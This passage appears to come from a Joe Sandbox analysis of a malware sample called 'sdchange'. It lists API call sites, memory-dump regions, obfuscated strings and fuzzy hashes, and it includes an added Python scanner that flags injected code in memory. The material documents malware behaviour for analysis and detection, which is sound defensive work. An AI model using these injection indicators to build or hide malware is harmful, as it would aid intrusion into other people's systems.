• String ID: %$)S$7O$Av$Eh$K$LT$R.$Tz$U$^$b$h$hU$p$q$r$s$t${$m$u
• API String ID: 2422867632-3469138154
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02711B70,02727CEE,027253AF,02711B40), ref: 02717F83
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID: ~7
• API String ID: 2340568224-1603439897
APIs
• Sleep.KERNELBASE(000007D0), ref: 0272389B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: wininet.dll
• API String ID: 3472027048-3354682871
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02714412
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02714412
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateProcessInternalW.KERNELBASE(?,?,?,?,0271811E,00000010,?,?,?,00000044,?,00000010,0271811E,?,?,?), ref: 02729680
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709E05
Memory Dump Source
• Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02709E05
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: af31efd8bd227fe044c684d51fe370113cc72b0572b381049b06e12d4343a1cf
                                                                                                                      • Instruction ID: ed6deb7c97a6c16d67c8d9aba02b61d0f73208365cef5884b39ee978139fb16c
                                                                                                                      • Opcode Fuzzy Hash: af31efd8bd227fe044c684d51fe370113cc72b0572b381049b06e12d4343a1cf
                                                                                                                      • Instruction Fuzzy Hash: D8F0E57324021076E231A2A98C06FDB739DDFC0B60F250019F788EB2C0DA92B90586E5
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02711879,?,027256B5,02711879,027253AF,027256B5,?,02711879,027253AF,00001000,?,?,00000000), ref: 0272957F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction ID: c54bf79516f1f804f9bfcc0d4a0b12f7abad56af432c85d5041ab53b91f81a32
                                                                                                                      • Opcode Fuzzy Hash: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction Fuzzy Hash: 37E06572201208BBDB10EE58EC44FAB3BADEFC9710F004418FA0DA7281C670B8148BB4
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,02713C12,000000F4), ref: 027295CC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction ID: e469beabf591e4b163c9baea8cedc48eb777f43fd9e8b93635fbf6c4f547f7cf
                                                                                                                      • Opcode Fuzzy Hash: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction Fuzzy Hash: 43E065B6200204BBD614EE59DC89FAB33ADEFC9714F00441AFA08A7240D630B810CAB8
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0271818C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: c2a94f8c2ab9474f79cbb454fe15d7603fa289170f7293361a09a69c9f74b6ad
                                                                                                                      • Instruction ID: 7c8ab42d2c4612c273737810cfb3e6dabde9b319a6016879d478042946de002d
                                                                                                                      • Opcode Fuzzy Hash: c2a94f8c2ab9474f79cbb454fe15d7603fa289170f7293361a09a69c9f74b6ad
                                                                                                                      • Instruction Fuzzy Hash: 2FE0267265020427FB20AAACDC45F66335AAF48728F184A64FA1CDB2C2E6B8F5018150
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0271818C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 2d0f5d596c3bd42d8979895f13e0bef32511b8b730510905a2684bf2e38407a9
                                                                                                                      • Instruction ID: 8a03df731969d95b255ae3622b35ebd1c1214b0a92fd92404f426be45daae5ae
                                                                                                                      • Opcode Fuzzy Hash: 2d0f5d596c3bd42d8979895f13e0bef32511b8b730510905a2684bf2e38407a9
                                                                                                                      • Instruction Fuzzy Hash: 95E0807655020427F724B65CCC45F6533666F48724F5C4654FA5C9B2C1D7B4E5015151
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02711B70,02727CEE,027253AF,02711B40), ref: 02717F83
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 11e6c51df6b1bf69c6866fd535af1d4f18b9f9aced007728cdea7892ec79bce8
                                                                                                                      • Instruction ID: 3a2c6ed52f95c26556e954c31514e03153115220aa70da6bd6d54d68de0d4163
                                                                                                                      • Opcode Fuzzy Hash: 11e6c51df6b1bf69c6866fd535af1d4f18b9f9aced007728cdea7892ec79bce8
                                                                                                                      • Instruction Fuzzy Hash: 63D05EB52902043FF700F6B88C0AF16369DAB41754F594168FA4CE72C2EA54E1004665
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02710C57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: c809d9ace770d773fe7cb53d58a20e9202e0589636535098963f5a6658a19a7c
                                                                                                                      • Instruction ID: 01452702c273f4482fcfd543d8734eb534c5b32b8aa89bfea59e6a652cbc457c
                                                                                                                      • Opcode Fuzzy Hash: c809d9ace770d773fe7cb53d58a20e9202e0589636535098963f5a6658a19a7c
                                                                                                                      • Instruction Fuzzy Hash: 91D0C96BB4111C7AAA125999ACC1DFEB76CEB85AA6F004067FF08E6140E66199060AB1
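The call sites resolved above (CreateThread, RtlAllocateHeap, RtlFreeHeap, GetFileAttributesW, SetErrorMode, PostThreadMessageW) all sit in the region at 02700000 that the report marks "based on PE: false": executable code that no loaded module accounts for. On a live host the equivalent triage signal is a committed, executable region whose type is not MEM_IMAGE, optionally carrying an MZ header the loader never mapped. The following is an added example and is not Joe Sandbox code or output: the PAGE_*/MEM_* constants are from winnt.h, enumerate_regions() uses the documented VirtualQueryEx/ReadProcessMemory calls on Windows only, the SAMPLE_REGIONS list is constructed (only the 02700000 base and its non-PE status come from the report; the sizes, the 0x0A000000 region and the other entries are hypothetical), and the PID argument is just an illustrative invocation.

```python
"""Flag executable memory that is not backed by a loader-mapped PE image.

Added example, not Joe Sandbox code. Constants from winnt.h; sample data constructed.
"""
import sys
from dataclasses import dataclass
from typing import Dict, List

# winnt.h memory constants
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

EXECUTABLE = (PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
WRITABLE_EXECUTABLE = (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)


@dataclass(frozen=True)
class Region:
    base: int
    size: int
    state: int          # MEM_COMMIT / MEM_RESERVE / MEM_FREE
    protect: int        # PAGE_* value plus optional modifier bits (PAGE_GUARD etc.)
    type: int           # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE
    head: bytes = b""   # first bytes of the region, when readable


def classify(region: Region) -> List[str]:
    """Return the reasons a region looks like injected or unpacked code (empty = nothing to flag)."""
    reasons: List[str] = []
    if region.state != MEM_COMMIT:
        return reasons                      # reserved or free memory holds no running code
    base_protect = region.protect & 0xFF    # strip PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE
    if base_protect not in EXECUTABLE:
        return reasons
    if region.type != MEM_IMAGE:
        reasons.append("executable code outside any loader-mapped PE image")
        if region.head[:2] == b"MZ":
            reasons.append("PE header in non-image memory (manually mapped module)")
    if base_protect in WRITABLE_EXECUTABLE:
        reasons.append("writable and executable at the same time (RWX)")
    return reasons


def scan(regions) -> Dict[int, List[str]]:
    """Map region base -> reasons, for every region classify() flags."""
    flagged: Dict[int, List[str]] = {}
    for region in regions:
        reasons = classify(region)
        if reasons:
            flagged[region.base] = reasons
    return flagged


def enumerate_regions(pid: int) -> List[Region]:
    """Walk another process' address space with VirtualQueryEx (Windows only)."""
    import ctypes
    from ctypes import wintypes

    PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010

    class MBI(ctypes.Structure):            # MEMORY_BASIC_INFORMATION (ctypes pads as the native struct does)
        _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wintypes.DWORD), ("RegionSize", ctypes.c_size_t),
                    ("State", wintypes.DWORD), ("Protect", wintypes.DWORD), ("Type", wintypes.DWORD)]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.VirtualQueryEx.argtypes = [wintypes.HANDLE, ctypes.c_void_p, ctypes.POINTER(MBI), ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]

    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    regions: List[Region] = []
    addr, mbi = 0, MBI()
    try:
        while k32.VirtualQueryEx(handle, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base = mbi.BaseAddress or 0
            head = b""
            if mbi.State == MEM_COMMIT:     # peek at the first two bytes to spot an MZ header
                buf, got = ctypes.create_string_buffer(2), ctypes.c_size_t(0)
                if k32.ReadProcessMemory(handle, base, buf, 2, ctypes.byref(got)):
                    head = buf.raw[:got.value]
            regions.append(Region(base, mbi.RegionSize, mbi.State, mbi.Protect, mbi.Type, head))
            addr = base + mbi.RegionSize    # VirtualQueryEx returns 0 past the end of user space
    finally:
        k32.CloseHandle(handle)
    return regions


# Constructed sample (not sandbox output). Only the 0x02700000 base and its "not a PE"
# status come from the report; every other attribute and region here is hypothetical.
SAMPLE_REGIONS = [
    Region(0x02700000, 0x30000, MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, b"\x55\x8b"),
    Region(0x0A000000, 0x1A0000, MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, b"MZ"),
    Region(0x77000000, 0x1C0000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_IMAGE, b"MZ"),   # normal DLL
    Region(0x00400000, 0x10000, MEM_COMMIT, 0x04, MEM_PRIVATE, b"\x00\x00"),         # PAGE_READWRITE heap
    Region(0x05000000, 0x100000, MEM_RESERVE, 0x00, MEM_PRIVATE),
]

if __name__ == "__main__":
    live = len(sys.argv) > 1 and sys.platform == "win32"
    regions = enumerate_regions(int(sys.argv[1])) if live else SAMPLE_REGIONS
    for base, reasons in sorted(scan(regions).items()):
        print(f"{base:#010x}: " + "; ".join(reasons))
```

Run without arguments it classifies the constructed sample; on Windows, `python scan.py <pid>` walks a live process. Treat the result as a triage lead, not a verdict: a .NET host (this sample is a .NET executable) legitimately holds RWX private JIT regions, and MEM_IMAGE alone does not clear a module, since a hollowed or overwritten image section keeps its type. Corroborate a hit with what the report shows here, namely API call sites and strings resolved inside the flagged region.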
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5390755f3d69905df5dfe46c75061981bb00115f4904ba69d46bbaae99cd4491
                                                                                                                      • Instruction ID: f42faa7d090eba497ddc9c877adb025af86af3af2bffeb967540ce11b9a720cb
                                                                                                                      • Opcode Fuzzy Hash: 5390755f3d69905df5dfe46c75061981bb00115f4904ba69d46bbaae99cd4491
                                                                                                                      • Instruction Fuzzy Hash: 43B09B71D025C5C5FB51FB64460871779406BD0705F15C061D2030751F5738D5D1F175
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 802e3b4cba91c50b6f60fa8a06f4d09d26afcb49eb05d8c9692640fa720e9ee4
                                                                                                                      • Instruction ID: 6ed63c1dd1e392351c291685ecc6e028eea7df92e142b30702dfe62747895a48
                                                                                                                      • Opcode Fuzzy Hash: 802e3b4cba91c50b6f60fa8a06f4d09d26afcb49eb05d8c9692640fa720e9ee4
                                                                                                                      • Instruction Fuzzy Hash: 5A41D871518B0E4FD768EF68A081676B3E2FB85314F50463DD98AC3292EA74F4468785
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                      • API String ID: 0-3558027158
                                                                                                                      • Opcode ID: 95a305c28a97bed85c99d851cbdcd5af69411470f5cc0edba5b98284e54cb02f
                                                                                                                      • Instruction ID: b5bd9ac6a32dfa0d5dec9ebaffca22f2bf3e54a9f974b4203c58f1e4a13235e3
                                                                                                                      • Opcode Fuzzy Hash: 95a305c28a97bed85c99d851cbdcd5af69411470f5cc0edba5b98284e54cb02f
                                                                                                                      • Instruction Fuzzy Hash: 469150F04083988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539591355.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4570000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %;-$,9?:$:}ax$?.d($apma$axy>$d(%;$ey|v$mxy.$mxy9$ta|z$teey$y9te${:m}$|vta$|z{:
                                                                                                                      • API String ID: 0-164121575
                                                                                                                      • Opcode ID: d3ed7e1a1c3758e5bc7aad41ac7dabce32668f9f7ef93d04a9f41d0bdda33049
                                                                                                                      • Instruction ID: 3d1ac4dc13359bbe1782114a7c73cade6188d1be0188478f9012906f696d4ade
                                                                                                                      • Opcode Fuzzy Hash: d3ed7e1a1c3758e5bc7aad41ac7dabce32668f9f7ef93d04a9f41d0bdda33049
                                                                                                                      • Instruction Fuzzy Hash: F61136B0C14A0C9ACF04DF96E8805EDBB74FB15344F10825AD415AE395DB345A82DF9A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 114685162dbb24c743ba3b6b0ec60c6a850f11afa4f92cc4c8ecd21b9e79598c
                                                                                                                      • Instruction ID: 5964d1ef847efe4e1c67f3068d9d75e0aee0ed55c6657e4526e91c04107f3445
                                                                                                                      • Opcode Fuzzy Hash: 114685162dbb24c743ba3b6b0ec60c6a850f11afa4f92cc4c8ecd21b9e79598c
                                                                                                                      • Instruction Fuzzy Hash: FA51D5A5E04216BFDB20DF99C89097EF7F8BB58204B108269E465D7745F274FE448BE0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: a0f060e1a2ed6aca516d1a2f30d238d8569b841c8d3625070578502c1d229577
                                                                                                                      • Instruction ID: 34cf3d473c2d227762bf4ae08ef7cfce4923f206660a986075a7b3a83c8dbb59
                                                                                                                      • Opcode Fuzzy Hash: a0f060e1a2ed6aca516d1a2f30d238d8569b841c8d3625070578502c1d229577
                                                                                                                      • Instruction Fuzzy Hash: 8D510371A00645AFDB20DE9DC89097EF7F8EF84244B008499F496D3742EBB4FE508BA0
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04704742
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04704787
                                                                                                                      • ExecuteOptions, xrefs: 047046A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04704725
                                                                                                                      • Execute=1, xrefs: 04704713
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047046FC
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04704655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: 641fc0bed2d7f5e3437c13db3688622605c6f105e6a86913c29bfb5d75f83d7b
                                                                                                                      • Instruction ID: 8a97bee3a66fe4e9ff9bb5735cbab0649a43d5067c849ef91822ce7678b4499b
                                                                                                                      • Opcode Fuzzy Hash: 641fc0bed2d7f5e3437c13db3688622605c6f105e6a86913c29bfb5d75f83d7b
                                                                                                                      • Instruction Fuzzy Hash: F5512831B4021AABEF10ABA5DC89BFD73A8EB15305F14009DE605A7290FB71BE418F54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction ID: 3c112dd41284b53c849903da6e4dfd54c0fbe5abbc54edef1eb3ccbd7564cba5
                                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction Fuzzy Hash: E7021571508341AFD709CF18C494A6ABBE6EFC4704F548A2DF98A9B364DB31E945CB42
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: 208bd040a1ddf8b36d5da18dc757eb5db401a45711bb390d47763b5d5890b4fb
